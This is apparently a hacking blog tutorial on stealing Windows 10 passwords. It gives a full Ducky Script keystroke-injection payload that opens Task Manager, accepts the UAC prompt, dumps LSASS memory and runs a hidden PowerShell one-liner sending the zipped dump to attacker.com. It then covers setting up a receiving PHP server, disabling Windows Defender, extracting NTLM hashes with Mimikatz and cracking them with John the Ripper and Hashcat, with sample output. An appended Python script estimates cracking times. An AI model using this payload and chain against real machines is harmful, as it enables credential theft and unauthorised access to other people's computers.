Windows 10 passwords are stored as NTLM hashes (or, more specifically, NT hashes) that can be dumped within a few seconds and exfiltrated to an attacker's system. The hashes can then be brute-forced and cracked to reveal the passwords in plaintext using a combination of tools, including Mimikatz, ProcDump, John the Ripper and Hashcat.
Let us first discuss the Local Security Authority Subsystem Service, or LSASS, an essential part of the Windows operating system.
LSASS is responsible for enforcing the security policy, handling domain authentication and managing Active Directory. It spawns the processes responsible for authenticating users with NTLM and verifies the validity of logons. Because it is so crucial to the functioning of the operating system, hackers often name malicious executables after the process.
Mimikatz & ProcDump
Mimikatz, written by gentilkiwi, can be used to extract password hashes, Kerberos tickets and PIN codes from the Windows 1
Today, Windows Defender and antivirus software have become increasingly effective at detecting Mimikatz versions and signatures (shown below).
In combination with Mimikatz, hackers now use ProcDump, a standalone executable designed for administrators to monitor applications for crashes.
ProcDump is used to create the LSASS dump, which is later moved to an offline Windows 10 computer and analyzed with Mimikatz. This is still an effective technique for extracting credentials from Windows 10 because ProcDump is a signed Microsoft binary and is not flagged by most antivirus software (shown below).
Windows 10's Task Manager can also be used to dump LSASS memory without the help of Mimikatz or ProcDump. Below is an example of a MouseJack payload designed to extract and exfiltrate the LSASS dump using only keystroke injection and PowerShell. The attack completes within ten seconds (it is slowed down at certain points for readability).
Task Manager is opened with administrative rights from the Run window. The screen goes completely dark for a second due to the User Account Control (UAC) prompt, which prevents the GIF recorder from capturing the screen. Next, the Local Security Authority Process (lsass.exe) is located in the process list and dumped to the %TEMP% folder (the default). A PowerShell one-liner is then executed from the Run window. It compresses the LSASS dump into a ZIP file and sends it to the attacker's server.
At this point, the attacker can use Mimikatz on an offline Windows 10 computer or virtual machine (with no antivirus software installed) to extract the hashed passwords.
Step 1: Make the Keystroke Injection Payload
The keystroke injection payload below can be delivered via MouseJack vulnerabilities or a USB Rubber Ducky.
While the MouseJack vulnerabilities were disclosed a few years ago, tens of millions of keyboards and mice (including Logitech devices) are believed to still be susceptible to keystroke injection. As Marcus Mengs, creator of P4wnP1, illustrates in his proof-of-concept video, Logitech dongles are still vulnerable to remote attacks.
Comments (REM) have been added to each line of the payload for clarification.
REM 2.5 second delay to give Windows 10 some time to properly
REM mount the USB Rubber Ducky. This initial delay is not
REM required for MouseJack attacks.
DELAY 2500
REM Open the Run command window.
GUI r
REM Allow the Run command window 1 second to open.
DELAY 1000
REM Type "taskmgr" (i.e., Task Manager) into the Run window.
STRING taskmgr
REM Delay for 0.5 seconds.
DELAY 500
REM The Ctrl + Shift + Enter key combination is pressed to invoke
REM the User Account Control (UAC) window. This causes
REM taskmgr to open with administrator privileges.
CTRL-SHIFT ENTER
REM Wait for the UAC window to appear. This may take a few seconds
REM on some Windows 10 machines.
DELAY 2500
REM ALT + y key combination to accept and bypass the UAC
REM prompt.
ALT y
REM Wait a few seconds for Task Manager to fully open with
REM administrator privileges. This took (on average) 5.5 seconds in my
REM tests. In some scenarios, with high-end CPUs, this delay
REM can be considerably lower.
DELAY 5500
REM Press the Down arrow key to move from the toolbar to the
REM list of active background processes.
DOWN
REM Type "local" to jump down and highlight the "Local Security
REM Authority Process".
STRING local
REM SHIFT + F10 key combination invokes the right-click options
REM menu.
SHIFT F10
REM Allow 1.2 seconds for the options menu to fully open.
DELAY 1200
REM Press the Down arrow key four times to highlight the "Create
REM dump file" option.
DOWN
DOWN
DOWN
DOWN
REM Press Enter to select the "Create dump file" option.
ENTER
REM Wait 3.5 seconds for the dump file to be created and saved
REM to the %TEMP% folder.
DELAY 3500
REM Press Enter to select "OK" and close the dump pop-up window.
ENTER
REM ALT + F4 combination to close the Task Manager window.
ALT F4
REM Wait .7 seconds for Task Manager to close.
DELAY 700
REM Reopen the Run command window.
GUI r
REM Wait .7 seconds for the Run window to open.
DELAY 700
REM PowerShell one-liner to compress and exfiltrate the LSASS
REM dump file. Each part of the one-liner is explained in more
REM detail below.
STRING powershell -ep bypass /w 1 /C $t=$env:temp;$l='lsass.DMP';compress-archive -path $t\$l -destinationpath $t\a.zip;iwr attacker.com/i.php -method POST -infile $t\a.zip
REM Press Enter to execute the PowerShell one-liner.
ENTER
The PowerShell payload consists of several commands chained together with semicolons:
- powershell -ep bypass /w 1 /C – The ExecutionPolicy (-ep) is set to "bypass" to allow PowerShell execution past Windows Defender and some antivirus software. The WindowStyle (/w) is set to "1", which immediately hides the PowerShell pop-up terminal.
- $t=$env:temp; – The target's temporary folder is assigned to the variable $t. Using single-letter variables helps shorten the overall length of the payload; it is more efficient than typing "C:\Users\%USERNAME%\AppData\Local\Temp" over and over.
- $l='lsass.DMP'; – The file name lsass.DMP is assigned to the variable $l. This file name is set automatically by Task Manager.
- compress-archive -path $t\$l -destinationpath $t\a.zip; – PowerShell's Compress-Archive cmdlet is used to zip lsass.DMP into the "a.zip" file (-destinationpath).
- iwr attacker.com/i.php -method POST -infile $t\a.zip – Invoke-WebRequest (iwr) sends a.zip (-infile) to the attacker's server as a POST request. Be sure to change "attacker.com" to the local IP address of the Kali machine or the virtual private server address.
Before performing the keystroke injection, a PHP server is required to receive the exfiltrated dump.
The keystroke payload expects a server on port 80. For simplicity, this example uses Kali Linux on a local network, where root privileges are already in use. Setting this up on a virtual private server likewise requires root to open a listening service on port 80.
Non-Kali users can elevate to root with the following command:
~$ sudo su
Then create a folder named "phpServer/" using the mkdir command below.
~$ mkdir phpServer/
Change into the phpServer/ folder with the cd command.
~$ cd phpServer/
Create a file named "i.php" with nano.
~$ nano i.php
Paste the PHP script below into the nano terminal. When that is done, press Ctrl + x, then y, then Enter to save and exit nano.
This simple PHP script receives ZIP files and does not need to be modified in any way to function. When the Windows 10 target sends a .zip, the PHP server saves the data using the current time as the file name.
Start the PHP server with the command php -S 0.0.0.0:80. The -S tells PHP to start a web server, while 0.0.0.0 tells it to host the server on every IPv4 interface.
~$ php -S 0.0.0.0:80
PHP 7.3.0-2 Development Server started
Listening on http://0.0.0.0:80
Document root is /root/phpServer
Press Ctrl-C to quit.
Step 3: Extract the Hash with Mimikatz
After the ZIP has been received, move it to a Windows 10 computer or virtual machine. Extract it to find the lsass.DMP file.
Be sure to disable Windows Defender and other security features before downloading Mimikatz. Open the Start menu and search for "virus".
Click on "Virus & threat protection settings" and disable all available options. Alternatively, a virtual machine without Windows Defender or SmartScreen can be set up for Mimikatz activities.
At the time of this writing, the latest version of Mimikatz is 2.2.0. Open a web browser and navigate to the GitHub repository to find the latest "mimikatz_trunk.zip" release.
After unpacking the Mimikatz ZIP, open a PowerShell terminal. Use the following command to run mimikatz.exe; the mimikatz prompt will appear.
PS C:\> & "C:\Users\$env:username\PATH\TO\MIMIKATZ\x64\mimikatz.exe"

  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 13 2019 01:35:04
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( email@example.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( firstname.lastname@example.org )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz #
The following sekurlsa::minidump command loads the lsass.DMP into Mimikatz.
mimikatz # sekurlsa::minidump C:\Users\%USERNAME%\Documents\lsass.DMP
Switch to MINIDUMP : 'C:\Users\tokyoneon\Documents\lsass.DMP'
Then use the sekurlsa::logonPasswords command to extract the credential hashes. Since Windows 8, plaintext passwords are no longer stored in memory unless the operating system is further modified. But that doesn't mean Windows 10 hashes can't be brute-forced and easily cracked. On line 12 we find the password hash in NTLM format.
mimikatz # sekurlsa::logonPasswords
Opening : 'C:\Users\tokyoneon\Documents\lsass.DMP' file for minidump...

1  Authentication Id : 0 ; 102597 (00000000:000190c5)
2  Session           : Interactive from 1
3  User Name         : tokyoneon
4  Domain            : MSEDGEWIN10
5  Logon Server      : MSEDGEWIN10
6  Logon Time        : 5/31/2019 1:01:05 AM
7  SID               : S-1-5-21-3859058339-3768143778-240673529-1000
8          msv :
9           Primary
10          * Username   : tokyoneon
11          * Domain     : MSEDGEWIN10
12          * NTLM       : 7b5e40a5b7b17972ad793b9fc868a66e
13          * SHA1       : 6076b8f4d982b55097f910b3fb5a81c801954406
14         tspkg :
15         wdigest :
16          * Username   : tokyoneon
17          * Domain     : MSEDGEWIN10
18          * Password   : (null)
19         kerberos :
20          * Username   : tokyoneon
21          * Domain     : MSEDGEWIN10
22          * Password   : (null)
23         ssp :
24         credman :
25 Authentication Id : 0 ; 102306 (00000000:00018fa2)
26 Session           : Interactive from 1
27 User Name         : tokyoneon
28 Domain            : MSEDGEWIN10
29 Logon Server      : MSEDGEWIN10
30 Logon Time        : 5/31/2019 1:01:05 AM
31 SID               : S-1-5-21-3859058339-3768143778-240673529-1000
32         msv :
33          Primary
34          * Username   : tokyoneon
35          * Domain     : MSEDGEWIN10
36          * NTLM       : 7b5e40a5b7b17972ad793b9fc868a66e
37          * SHA1       : 6076b8f4d982b55097f910b3fb5a81c801954406
38         tspkg :
39         wdigest :
40          * Username   : tokyoneon
41          * Domain     : MSEDGEWIN10
42          * Password   : (null)
43         kerberos :
44          * Username   : tokyoneon
45          * Domain     : MSEDGEWIN10
46          * Password   : (null)
47         ssp :
48         credman :
49 Authentication Id : 0 ; 74052 (00000000:00012144)
50 Session           : Service from 0
51 User Name         : sshd_server
52 Domain            : MSEDGEWIN10
53 Logon Server      : MSEDGEWIN10
54 Logon Time        : 5/31/2019 1:01:04 AM
55 SID               : S-1-5-21-3859058339-3768143778-240673529-1003
56         msv :
57          Primary
58          * Username   : sshd_server
59          * Domain     : MSEDGEWIN10
60          * NTLM       : 8d0a16cfc061c3359db455d00ec27035
61          * SHA1       : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
62         tspkg :
63         wdigest :
64          * Username   : sshd_server
65          * Domain     : MSEDGEWIN10
66          * Password   : (null)
67         kerberos :
68          * Username   : sshd_server
69          * Domain     : MSEDGEWIN10
70          * Password   : (null)
71         ssp :
72         credman :

mimikatz #
Step 4: Brute-Forcing the NTLM Hash
As a small experiment, I wanted to know how long it would take a Raspberry Pi 3B+, a common Intel i7 CPU, and a GeForce GTX GPU to crack the same hash of a password consisting of six random lowercase letters followed by two random digits (e.g., nchfyr56).
1. Brute-Force with Raspberry Pi 3B+ (John the Ripper)
After installing John the Ripper on a Raspberry Pi 3B+, the password (nchfyr56) was guessed in just over five hours. Since most passwords are eight characters long, mask attacks with a Raspberry Pi are surprisingly practical for brute-forcing NTLM hashes.
~$ john --mask=?l?l?l?l?l?l?d?d --format=NT /root/Desktop/hash

Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 32/32])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
nchfyr56         (?)
1g 0:05:19:24 DONE (2018-06-22 16:36) 0.000052g/s 1389Kp/s 1389Kc/s 1389KC/s achfyr56..zuhfyr56
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
2. Brute-Force with Intel i7 CPU (Hashcat CPU)
The same NTLM hash took only three minutes to crack with an old Intel i7, but an estimated fifteen minutes would have been needed to exhaust the full keyspace.
~$ hashcat /tmp/hash -m 1000 -a3 ?l?l?l?l?l?l?d?d

hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-3537U CPU @ 2.00GHz, 2048/5809 MB allocatable, 4MCU

7b5e40a5b7b17972ad793b9fc868a66e:nchfyr56

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started.....: Fri Aug 31 21:48:25 2019 (2 mins, 50 secs)
Time.Estimated...: Fri Aug 31 21:51:15 2019 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?d?d
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 35719.8 kH/s (7.23ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6049366016/30891577600 (19.58%)
Rejected.........: 0/6049366016 (0.00%)
Restore.Point....: 344064/1757600 (19.58%)
Restore.Sub.#1...: Salt:0 Amplifier:896-1024 Iteration:0-128
Candidates.#1....: hstrxp56 -> tjoqxn56

Started: Fri Aug 31 21:48:09 2019
Stopped: Fri Aug 31 21:51:16 2019
3. Brute-Force with GeForce GTX GPU (Hashcat GPU)
The NTLM hash was cracked within a second. This was achieved with a fairly low-end GeForce GTX 1060 GPU.
~$ hashcat /tmp/hash -m 1000 -a3 ?l?l?l?l?l?l?d?d

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 3GB, 754/3018 MB allocatable, 9MCU

7b5e40a5b7b17972ad793b9fc868a66e:nchfyr56

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started.....: Fri Aug 31 03:00:38 2019 (0 secs)
Time.Estimated...: Fri Aug 31 03:00:38 2019 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?d?d
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4658.0 MH/s (7.06ms) @ Accel:128 Loops:32 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1094713344/30891577600 (3.54%)
Rejected.........: 0/1094713344 (0.00%)
Restore.Point....: 0/1757600 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:896-928 Iteration:0-32
Candidates.#1....: hstera12 -> eusind80
Hardware.Mon.#1..: Temp: 34c Fan: 25% Util: 92% Core:1898MHz Mem:3802MHz Bus:16

Started: Fri Aug 31 03:00:34 2019
Stopped: Fri Aug 31 03:00:39 2019
When testing a stronger password of eight letters and two digits (for example Psjhfhdd48) against the GPU, the hash was cracked within twenty-five minutes.
~$ hashcat /tmp/hash2 -w4 -O -m 1000 -a3 ?u?l?l?l?l?l?l?l?d?d

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 3GB, 754/3018 MB allocatable, 9MCU

30346ad7463810ea4d5a58090611e368:Psjhfhdd48

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 30346ad7463810ea4d5a58090611e368
Time.Started.....: Fri Aug 31 03:19:11 2019 (23 mins, 28 secs)
Time.Estimated...: Fri Aug 31 03:42:39 2019 (0 secs)
Guess.Mask.......: ?u?l?l?l?l?l?l?l?d?d
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12459.0 MH/s (97.89ms) @ Accel:256 Loops:676 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 17567648317440/20882706457600 (84.13%)
Rejected.........: 0/17567648317440 (0.00%)
Restore.Point....: 25985286144/30891577600 (84.12%)
Restore.Sub.#1...: Salt:0 Amplifier:0-676 Iteration:0-676
Candidates.#1....: Mackuobd48 -> Xzkmatgd48
Hardware.Mon.#1..: Temp: 73c Fan: 50% Util:100% Core:1835MHz Mem:3802MHz Bus:16

Started: Fri Aug 31 03:19:09 2019
Stopped: Fri Aug 31 03:42:40 2019
Even stronger NTLM hashes (eight letters + four digits) needed an estimated two days to crack.
~$ hashcat /tmp/hash3 -w4 -O -m 1000 -a3 ?u?l?l?l?l?l?l?l?d?d?d?d

Session..........: hashcat
Status...........: Running
Hash.Type........: NTLM
Hash.Target......: aa110854b242ed77c07be54e62611464
Time.Started.....: Fri Aug 31 03:43:40 2019 (45 secs)
Time.Estimated...: Sun Sep  2 01:48:09 2019 (1 day, 22 hours)
Guess.Mask.......: ?u?l?l?l?l?l?l?l?d?d?d?d
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12589.8 MH/s (96.68ms) @ Accel:256 Loops:676 Thr:1024 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 559804317696/2088270645760000 (0.03%)
Rejected.........: 0/559804317696 (0.00%)
Restore.Point....: 828112896/3089157760000 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-676 Iteration:0-676
Candidates.#1....: Maecdesr2000 -> Xzoejixr2000
Hardware.Mon.#1..: Temp: 65c Fan: 38% Util:100% Core:1847MHz Mem:3802MHz Bus:16

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
For hackers with dedicated brute-force machines, two days is very realistic. With a cluster of high-end GPUs, an attacker can easily crack any hash derived from a wider keyspace.
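To put the timings above in perspective, here is an added Python example (not from the original article) that computes the size of each hashcat mask used on this page and the worst-case time to exhaust it at the rates john and hashcat reported; the keyspaces it computes are the denominators in hashcat's Progress lines above, and the extra ?a mask row is an assumption added for comparison to show what a longer, fully random password does to the same hardware.

```python
import re

# Sizes of the built-in hashcat charsets; ?l, ?u and ?d are the ones used on this page,
# ?s and ?a are added only for the comparison row.
CHARSETS = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}

# Candidate rates in hashes per second, read off the benchmark output above:
# john's 1389Kp/s on the Pi and hashcat's Speed.#1 lines on the i7 and GTX 1060.
RATES = {
    "Raspberry Pi 3B+ (john)":   1_389_000,
    "Intel i7-3537U (hashcat)":  35_719_800,
    "GTX 1060 (hashcat)":        4_658_000_000,
    "GTX 1060 (hashcat -w4 -O)": 12_459_000_000,
}

def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat/john mask enumerates, e.g. ?l?l?d -> 26*26*10."""
    tokens = re.findall(r"\?(.)", mask)
    if "".join("?" + t for t in tokens) != mask or any(t not in CHARSETS for t in tokens):
        raise ValueError(f"unsupported mask: {mask!r}")
    size = 1
    for t in tokens:
        size *= CHARSETS[t]
    return size

def seconds_to_exhaust(mask: str, rate: int) -> float:
    """Worst-case time to try every candidate of `mask` at `rate` hashes per second."""
    return mask_keyspace(mask) / rate

def human(seconds: float) -> str:
    """Rough human-readable duration."""
    if seconds < 60:
        return f"{seconds:.1f} s"
    if seconds < 3600:
        return f"{seconds / 60:.1f} min"
    if seconds < 86400:
        return f"{seconds / 3600:.1f} h"
    return f"{seconds / 86400:.1f} days"

def crack_time_table(masks, rates=RATES):
    """Return {mask: {device: worst-case seconds}} for every mask/rate pair."""
    return {m: {dev: seconds_to_exhaust(m, r) for dev, r in rates.items()} for m in masks}

if __name__ == "__main__":
    masks = ["?l?l?l?l?l?l?d?d",           # nchfyr56 (this page)
             "?u?l?l?l?l?l?l?l?d?d",       # Psjhfhdd48 (this page)
             "?u?l?l?l?l?l?l?l?d?d?d?d",   # eight letters + four digits (this page)
             "?a?a?a?a?a?a?a?a?a?a"]       # assumed: ten fully random printable characters
    for mask, row in crack_time_table(masks).items():
        print(f"{mask:26} keyspace={mask_keyspace(mask):.3e}")
        for dev, secs in row.items():
            print(f"    {dev:26} {human(secs)}")
```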
Follow me on Twitter @tokyoneon_ and GitHub until next time. And as always, leave a comment below or message me if you have any questions.